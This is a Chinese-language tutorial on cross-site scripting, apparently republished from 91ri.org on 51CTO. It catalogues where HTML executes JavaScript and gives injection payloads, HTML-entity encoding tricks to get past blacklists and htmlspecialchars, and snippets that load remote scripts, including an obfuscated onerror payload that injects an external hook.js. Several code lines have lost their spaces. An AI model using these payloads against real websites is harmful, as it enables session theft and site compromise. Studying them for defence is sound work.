前端安全:know it then hack it

安全 黑客攻防 应用安全
属性值引入javascript:[code]伪协议,来执行javascript代码。也就是$a=javascript:alert(1),只有引用文件的属性才能触发javascript脚本。

一、html可以执行javascript的地方有哪些?

先举个例子比如这个代码

1<a href="$a">f4ck</a>

变量$a可控,怎么让这个代码弹框(执行javascript代码)呢?

(1)属性值引入javascript:[code]伪协议,来执行javascript代码。也就是$a=javascript:alert(1)

只有引用文件的属性才能触发javascript脚本,这些标签有:

href

action

bgsound

background

value

dynsrc

lowsrc。

1<formaction="javascript:alert(1)">

2<input type="text"name="name"value="">

3<input type="submit"value="提交">

4</form>

5<img src="javascript:alert('1');"/>

由于这些属性值不是通用属性,所以会在不同的标签中,如果在火狐上测试不成功请在ie下测试,我用ie6测试是成功的。

(2)"闭合前一个属性值,引入事件驱动属性。事件驱动属性的值是javascript代码,所以可以执行javascript。事件驱动属性是标签的通用属性,所以所有标签都可以用。也就是

1$a="onclick=alert(1)

2这样的事件驱动属性标签还有:

ondblclick

onmousedown

onmouseup

onmouseover

onmousemove

onmouseout

onmousepress

onmousedown

onmouseup

1<a href=""onclick=alert(1)>f4ck</a>

(3)闭合标签,引入<script></scirpt>标签来执行javascript代码。也就是:

1$a="><script>alert(1)</script>

(4)CSS可以通过expression属性执行javascript代码

expression是ie独有的css属性,其目的是为了插入一段javascript代码。

1<pstyle="xss:expression(alert(1))">

在ie6下执行成功。

1@import"http://www.91ri.org/xss.css";

可以从外部导入存在xss代码的css样式。

如果css属性可控,除了可以在expression后面添加javascript代码执行外,还可以像(2)(3)一样通过闭合标签和属性值来达到执行javascript的目的。

乌云上的案例:http://www.wooyun.org/tags/css%E...5%AF%BC%E8%87%B4xss

综上,可以在html里执行javascript的地方有

1、利用javascript:在属性值里2、事件驱动属性3、<script></script>标签中(包括这种形式<scriptsrc="http://www.91ri.org/1.js"></script>)4、CSS中的expression属性中(仅IE)。

二、为什么编码后的代码仍然可以执行?

(1)上面的$a是没被过滤的,但假如被过滤了怎么办,假如只是黑名单过滤了javascript,或者只是对$a进行了htmlspecialchars()转换。执行javascript的地方只进行了html编码。

<a href="$a">f4ck</a>

$a的值

1&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

$a的值

1j&#97;v&#97;s&#99;ript&#58;&#97;lert&#40;&#49;&#41;

$a的值:

1javascript:alert(1)

以上为html的三种编码。提交后,可以绕过黑名单javascript,进行htmlspecialchars()编码是不会发生任何变化的,那么,这段代码为什么会执行?

因为这个代码,浏览器从头解析当解析到,$a的值时,正常将它解码,就变成javascript:alert(1),然后这个代码在href属性中,所以就执行了。

三、怎么远程加载外部js?

先来说说html标记,html标记其实可以分为两种

1、文本用闭合标签。

例:<h1>f4ck</h1>

2、引用内容用自闭合标签。

例:<img src="http://www.91ri.org/img/bdlogo.gif"/>

浏览器会在html页面加载时,额外向服务器发送请求,注:这里是html标签的特性,不要和同源策略相混淆,同源策略是用来限制浏览器的。

加载进来的js和本域是同源的。

哪些标签可以远程加载外部js,并执行呢?

1、

1<scriptsrc="www.91ri.org/1.js"></script>

2、

1<iframesrc="www.91ri.org/1.js"></iframe>

3、

1<iframesrc=javascript:with(document)0[body.appendChild(document.createElement('script')).src="http://url.cn/1.js"]></iframe>

其实3就是dom的方法创建和插入节点。

1vars=document.createElement("script");

2s.src="http://www.91ri.org/xss.js";

3document.getElementsByTagName("head")[0].appendChild(s);

直接用3用于

viewsource

1<img src='#'onerror=“vara=document.getElementsByTagName('head').item(0);

2varb=document.createElement(String.fromCharCode(115,99,114,105,112,116));

3b.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);

4b.src=‘hook.js';

5a.appendChild(b);">

责任编辑:吴玮 来源: 91ri.org
相关推荐

2015-06-12 11:26:02

CSS浏览器 CSS Hac

2021-12-17 10:14:42

黑客网络安全网络攻击

2020-11-05 10:20:54

前端编码规范安全漏洞

2016-08-29 17:28:53

JavascriptHtmlThis

2022-04-26 05:19:38

安全漏洞漏洞黑客

2014-11-03 10:14:22

2009-12-04 10:19:11

PHP hack

2017-05-16 14:25:28

2012-04-26 19:27:18

2014-04-09 10:08:06

FacebookHack

2010-09-07 13:04:14

CSS Hack

2010-09-16 11:31:17

CSS Hack

2016-01-06 15:00:49

2010-09-16 14:09:03

CSS hackGoogleChrom

2010-09-01 10:17:38

CSShack注释

2022-05-24 06:07:48

JShack用户代码

2010-09-15 15:59:11

CSS hack

2015-09-01 15:45:50

开源字体Hack

2010-09-15 15:39:03

CSS hack

2014-03-21 10:45:33

FacebookHack
点赞
收藏

51CTO技术栈公众号